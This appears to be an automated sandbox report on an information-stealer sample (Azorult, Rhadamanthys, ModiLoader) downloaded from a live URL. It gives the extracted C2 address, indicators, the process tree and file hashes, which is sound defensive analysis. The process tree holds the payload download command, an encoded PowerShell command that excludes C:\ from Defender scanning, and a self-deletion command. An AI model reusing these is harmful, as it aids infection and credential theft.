Analysis
-
max time kernel
137s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23-03-2023 15:07
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://beachwood.ug/ghjkl.exe
Resource
win10v2004-20230220-en
General
-
Target
http://beachwood.ug/ghjkl.exe
Malware Config
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Detect rhadamanthys stealer shellcode 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1668-190-0x0000000000F60000-0x0000000000F7C000-memory.dmp family_rhadamanthys behavioral1/memory/1668-199-0x0000000000F60000-0x0000000000F7C000-memory.dmp family_rhadamanthys behavioral1/memory/1668-202-0x0000000000F60000-0x0000000000F7C000-memory.dmp family_rhadamanthys behavioral1/memory/1668-209-0x0000000000F60000-0x0000000000F7C000-memory.dmp family_rhadamanthys -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2580-228-0x00000000022C0000-0x00000000022EC000-memory.dmp modiloader_stage2 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ghjkl.exeBCC8.tmp.exeC4C8.tmp.exeC4C8.tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation ghjkl.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation BCC8.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation C4C8.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation C4C8.tmp.exe -
Executes dropped EXE 8 IoCs
Processes:
ghjkl.exeghjkl.exeghjkl.exeBCC8.tmp.exeC4C8.tmp.exeC805.tmp.exeBCC8.tmp.exeC4C8.tmp.exepid process 1488 ghjkl.exe 4216 ghjkl.exe 1668 ghjkl.exe 2252 BCC8.tmp.exe 3400 C4C8.tmp.exe 2580 C805.tmp.exe 2856 BCC8.tmp.exe 4456 C4C8.tmp.exe -
Loads dropped DLL 4 IoCs
Processes:
C4C8.tmp.exepid process 4456 C4C8.tmp.exe 4456 C4C8.tmp.exe 4456 C4C8.tmp.exe 4456 C4C8.tmp.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
ghjkl.exepid process 1668 ghjkl.exe 1668 ghjkl.exe 1668 ghjkl.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
ghjkl.exeBCC8.tmp.exeC4C8.tmp.exedescription pid process target process PID 1488 set thread context of 1668 1488 ghjkl.exe ghjkl.exe PID 2252 set thread context of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 3400 set thread context of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4672 3476 WerFault.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dllhost.exeC4C8.tmp.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C4C8.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C4C8.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4084 timeout.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d42e80ebae45d901 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0addab7a15dd901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E1B5C8C3-C994-11ED-9EF6-E2BD7878EA51} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c076ebb7a15dd901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31022497" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000016b1b6fc7cfc59429b2ebf78760d5fe300000000020000000000106600000001000020000000f6f861e595139211cf4887efdb6248a8f02459222e8821e9fd3a3f3a95756622000000000e8000000002000020000000e580dc94fa3fd93813b348931a69ec540a76b717810c33a425bb961ee309089a20000000a9cb4222dd010f2be470cfc2553c13ef5a25994666cf92b6f855cb893a0c323b4000000033becdffd9e996a71855bafc790a92dedfde28bfc2584876a9d16ea56234ff4034d97b6568391ccf19d843f1ad1e4cb61761a8dc52c1da51817965ed3ec23260 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000016b1b6fc7cfc59429b2ebf78760d5fe300000000020000000000106600000001000020000000992547cce4d667f9c28b881ac302e655ab2ca8c59ba1ba6599fbb2067c2b1fe2000000000e8000000002000020000000205fd07ad3ae57e9d01ad6d12f2af0c6bc6da7cb181304e1fd4492f3b79e67f5200000006e43d59b08b73869f43c7a0a2065e5976a9800b14c1114915f4f7b045a16920840000000675e9dfd4e22de8b282ebfc675889d54bff59398a78b1dc906ac6a6de4bc692551943005b9dcab949550cc46a960ca2cd0d8e13923491d33bf57a48c10910e77 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "386352657" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3064100516" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31022497" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{974CC2C5-87B8-4621-887D-665A6C905092}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3064256550" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeghjkl.exeghjkl.exedllhost.exepowershell.exepowershell.exepowershell.exeC4C8.tmp.exepid process 5104 powershell.exe 5104 powershell.exe 5104 powershell.exe 1488 ghjkl.exe 1488 ghjkl.exe 1668 ghjkl.exe 1668 ghjkl.exe 2024 dllhost.exe 2024 dllhost.exe 2024 dllhost.exe 2024 dllhost.exe 832 powershell.exe 832 powershell.exe 4908 powershell.exe 4908 powershell.exe 2096 powershell.exe 2096 powershell.exe 4456 C4C8.tmp.exe 4456 C4C8.tmp.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeghjkl.exepowershell.exepowershell.exeBCC8.tmp.exepowershell.exeC4C8.tmp.exedescription pid process Token: SeDebugPrivilege 5104 powershell.exe Token: SeDebugPrivilege 1488 ghjkl.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 2252 BCC8.tmp.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 3400 C4C8.tmp.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
iexplore.exepid process 1588 iexplore.exe 1588 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1588 iexplore.exe 1588 iexplore.exe 3768 IEXPLORE.EXE 3768 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
iexplore.exeghjkl.exeghjkl.exeBCC8.tmp.exeC4C8.tmp.execmd.exeC4C8.tmp.execmd.exedescription pid process target process PID 1588 wrote to memory of 3768 1588 iexplore.exe IEXPLORE.EXE PID 1588 wrote to memory of 3768 1588 iexplore.exe IEXPLORE.EXE PID 1588 wrote to memory of 3768 1588 iexplore.exe IEXPLORE.EXE PID 1588 wrote to memory of 1488 1588 iexplore.exe ghjkl.exe PID 1588 wrote to memory of 1488 1588 iexplore.exe ghjkl.exe PID 1588 wrote to memory of 1488 1588 iexplore.exe ghjkl.exe PID 1488 wrote to memory of 5104 1488 ghjkl.exe powershell.exe PID 1488 wrote to memory of 5104 1488 ghjkl.exe powershell.exe PID 1488 wrote to memory of 5104 1488 ghjkl.exe powershell.exe PID 1488 wrote to memory of 4216 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 4216 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 4216 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1488 wrote to memory of 1668 1488 ghjkl.exe ghjkl.exe PID 1668 wrote to memory of 2024 1668 ghjkl.exe dllhost.exe PID 1668 wrote to memory of 2024 1668 ghjkl.exe dllhost.exe PID 1668 wrote to memory of 2024 1668 ghjkl.exe dllhost.exe PID 1668 wrote to memory of 2024 1668 ghjkl.exe dllhost.exe PID 2252 wrote to memory of 832 2252 BCC8.tmp.exe powershell.exe PID 2252 wrote to memory of 832 2252 BCC8.tmp.exe powershell.exe PID 3400 wrote to memory of 4908 3400 C4C8.tmp.exe powershell.exe PID 3400 wrote to memory of 4908 3400 C4C8.tmp.exe powershell.exe PID 3400 wrote to memory of 4908 3400 C4C8.tmp.exe powershell.exe PID 2252 wrote to memory of 3304 2252 BCC8.tmp.exe cmd.exe PID 2252 wrote to memory of 3304 2252 BCC8.tmp.exe cmd.exe PID 2252 wrote to memory of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 2252 wrote to memory of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 2252 wrote to memory of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 2252 wrote to memory of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 2252 wrote to memory of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 2252 wrote to memory of 2856 2252 BCC8.tmp.exe BCC8.tmp.exe PID 3304 wrote to memory of 2096 3304 cmd.exe powershell.exe PID 3304 wrote to memory of 2096 3304 cmd.exe powershell.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 3400 wrote to memory of 4456 3400 C4C8.tmp.exe C4C8.tmp.exe PID 4456 wrote to memory of 888 4456 C4C8.tmp.exe cmd.exe PID 4456 wrote to memory of 888 4456 C4C8.tmp.exe cmd.exe PID 4456 wrote to memory of 888 4456 C4C8.tmp.exe cmd.exe PID 888 wrote to memory of 4084 888 cmd.exe timeout.exe PID 888 wrote to memory of 4084 888 cmd.exe timeout.exe PID 888 wrote to memory of 4084 888 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://beachwood.ug/ghjkl.exe1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"4⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3476 -ip 34761⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3476 -s 17681⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exe"C:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exeC:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exe"C:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exeC:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "C4C8.tmp.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\C805.tmp.exe"C:\Users\Admin\AppData\Local\Temp\C805.tmp.exe"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BCC8.tmp.exe.logFilesize
1KB
MD5235b41624578f64a6c072de2ef1541d8
SHA1e88702535e990b24f5aadadfe9bf799ab693cef7
SHA2568d61b54193d0a69e21ed33b2114372d27320a379139aee3d8b5077255bbe17ff
SHA5125453ab5a05c19d3ac00162c32898c628f64b3b77326fdc8b4cdb6e7dfb15a26e51654efb6add6d6b345da4e3727d6ba9c9ce9e134c747445b6ebb81e32edb440
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6K3GJRJ1\ghjkl[1].exeFilesize
2.8MB
MD50da8ff86305920cfdb0ab123d45ffa9d
SHA1aa31cd0743a25e2f7b4f4f0a217553afdb8e2678
SHA25660289bfd6a3a67726074cccced70f113419fea3b76c00855fb7dc5fa332d3f7a
SHA5128a851417a8abe971d682cc8a4bd20640998c552b28abea8d03b21735b126d62622ccb7457aa9e725aa5959f0f1b5f2da2edd51fe559983a916f8ec03251eddb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6K3GJRJ1\suggestions[1].en-USFilesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exeFilesize
2.8MB
MD50da8ff86305920cfdb0ab123d45ffa9d
SHA1aa31cd0743a25e2f7b4f4f0a217553afdb8e2678
SHA25660289bfd6a3a67726074cccced70f113419fea3b76c00855fb7dc5fa332d3f7a
SHA5128a851417a8abe971d682cc8a4bd20640998c552b28abea8d03b21735b126d62622ccb7457aa9e725aa5959f0f1b5f2da2edd51fe559983a916f8ec03251eddb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exeFilesize
2.8MB
MD50da8ff86305920cfdb0ab123d45ffa9d
SHA1aa31cd0743a25e2f7b4f4f0a217553afdb8e2678
SHA25660289bfd6a3a67726074cccced70f113419fea3b76c00855fb7dc5fa332d3f7a
SHA5128a851417a8abe971d682cc8a4bd20640998c552b28abea8d03b21735b126d62622ccb7457aa9e725aa5959f0f1b5f2da2edd51fe559983a916f8ec03251eddb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exeFilesize
2.8MB
MD50da8ff86305920cfdb0ab123d45ffa9d
SHA1aa31cd0743a25e2f7b4f4f0a217553afdb8e2678
SHA25660289bfd6a3a67726074cccced70f113419fea3b76c00855fb7dc5fa332d3f7a
SHA5128a851417a8abe971d682cc8a4bd20640998c552b28abea8d03b21735b126d62622ccb7457aa9e725aa5959f0f1b5f2da2edd51fe559983a916f8ec03251eddb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8OI4IV75\ghjkl.exe.xkwa691.partialFilesize
2.8MB
MD50da8ff86305920cfdb0ab123d45ffa9d
SHA1aa31cd0743a25e2f7b4f4f0a217553afdb8e2678
SHA25660289bfd6a3a67726074cccced70f113419fea3b76c00855fb7dc5fa332d3f7a
